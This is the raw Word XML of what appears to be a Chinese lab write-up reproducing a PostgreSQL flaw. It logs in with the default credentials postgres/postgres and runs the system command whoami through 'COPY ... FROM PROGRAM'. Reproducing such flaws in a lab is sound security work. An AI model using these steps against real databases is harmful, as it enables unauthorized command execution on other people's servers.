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FF5B39" w:rsidRDefault="00FF5B39">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF5B39">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF5B39" w:rsidRDefault="00FF5B3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FF5B39" w:rsidRDefault="00FF5B3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B39" w:rsidRDefault="00FF5B39">
                            <w:r w:rsidRPr="00FF5B39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FF5B39" w:rsidRDefault="00FF5B39">
                      <w:r w:rsidRPr="00FF5B39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5B39" w:rsidRDefault="00FF5B39">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF5B39" w:rsidRPr="00FF5B39" w:rsidRDefault="00FF5B39">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF5B39">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032F42" w:rsidRDefault="00FF5B39">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、连接到p</w:t>
      </w:r>
      <w:r>
        <w:t>ostgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00032F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认用户名密码都是p</w:t>
      </w:r>
      <w:r w:rsidR="00032F42">
        <w:t>ostgres</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032F42" w:rsidRDefault="00032F42">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5228492" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="10795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84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F42" w:rsidRDefault="00032F42" w:rsidP="00032F42">
                            <w:r>
                              <w:t>psql --host 172.26.120.36 --username postgres</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00032F42" w:rsidRDefault="00032F42" w:rsidP="00032F42">
                            <w:r>
                              <w:t>postgres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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00032F42" w:rsidRDefault="00032F42" w:rsidP="00032F42">
                      <w:r>
                        <w:t>psql --host 172.26.120.36 --username postgres</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00032F42" w:rsidRDefault="00032F42" w:rsidP="00032F42">
                      <w:r>
                        <w:t>postgres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5B39" w:rsidRDefault="00032F42">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、创建一张存放命令执行结果的表c</w:t>
      </w:r>
      <w:r>
        <w:t>md_result</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032F42" w:rsidRDefault="00032F42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F42" w:rsidRDefault="00032F42">
                            <w:r w:rsidRPr="00032F42">
                              <w:t>create table cmd_result(result text);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Otq5o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032F42" w:rsidRDefault="00032F42">
                      <w:r w:rsidRPr="00032F42">
                        <w:t>create table cmd_result(result text);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2F42" w:rsidRDefault="00032F42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、执行系统命令w</w:t>
      </w:r>
      <w:r>
        <w:t>hoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将返回结果保存于c</w:t>
      </w:r>
      <w:r>
        <w:t>md_result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF5B39" w:rsidRDefault="00032F42">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5187462" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="13335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4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F42" w:rsidRDefault="00032F42">
                            <w:r w:rsidRPr="00032F42">
                              <w:t>copy cmd_result from PROGRAM 'whoami';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8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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00032F42" w:rsidRDefault="00032F42">
                      <w:r w:rsidRPr="00032F42">
                        <w:t>copy cmd_result from PROGRAM 'whoami';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5B39" w:rsidRDefault="00032F42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、查表即可看到命令执行的结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF5B39" w:rsidRDefault="00032F42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F42" w:rsidRDefault="00032F42">
                            <w:r w:rsidRPr="00032F42">
                              <w:t>select * from cmd_result;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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00032F42" w:rsidRDefault="00032F42">
                      <w:r w:rsidRPr="00032F42">
                        <w:t>select * from cmd_result;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2F42" w:rsidRDefault="00032F42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A3339D9" wp14:editId="75F864DD">
            <wp:extent cx="3019425" cy="1028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A4" w:rsidRDefault="00416EA4" w:rsidP="00FF5B39">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00416EA4" w:rsidRDefault="00416EA4" w:rsidP="00FF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A4" w:rsidRDefault="00416EA4" w:rsidP="00FF5B39">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00416EA4" w:rsidRDefault="00416EA4" w:rsidP="00FF5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14"/>
    <w:rsid w:val="00032F42"/>
    <w:rsid w:val="00416EA4"/>
    <w:rsid w:val="00545614"/>
    <w:rsid w:val="008B5AE4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27E84"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1DAE8B60-68C9-4975-8A54-F5598AC3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2022-05-29T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-29T12:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>